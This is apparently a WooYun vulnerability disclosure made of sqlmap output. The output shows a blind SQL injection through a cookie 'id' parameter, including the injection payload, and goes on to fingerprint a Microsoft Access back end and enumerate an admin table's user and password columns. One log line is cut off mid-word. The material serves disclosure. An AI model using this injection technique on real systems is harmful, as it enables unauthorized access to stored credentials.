WooYun.org

Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 128 HTTP(s) requests:
---
Place: Cookie
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2947 AND 4225=4225
---
[16:53:21] [INFO] testing MySQL
[16:53:21] [WARNING] the back-end DBMS is not MySQL
[16:53:21] [INFO] testing Oracle
[16:53:21] [WARNING] the back-end DBMS is not Oracle
[16:53:21] [INFO] testing PostgreSQL
[16:53:21] [WARNING] the back-end DBMS is not PostgreSQL
[16:53:21] [INFO] testing Microsoft SQL Server
[16:53:22] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:53:22] [INFO] testing SQLite
[16:53:22] [WARNING] the back-end DBMS is not SQLite
[16:53:22] [INFO] testing Microsoft Access
[16:53:23] [INFO] confirming Microsoft Access
[16:53:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:53:23] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 131 times

Database: Microsoft_Access_masterdb
[3 tables]
+---------+
| admin   |
| article |
| url     |
+---------+
[16:57:42] [WARNING] HTTP error codes detected during run:
500 (Internal Serv
                                                                               
Database: Microsoft_Access_masterdb
Table: admin
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| id       | numeric     |
| password | non-numeric |
+----------+-------------+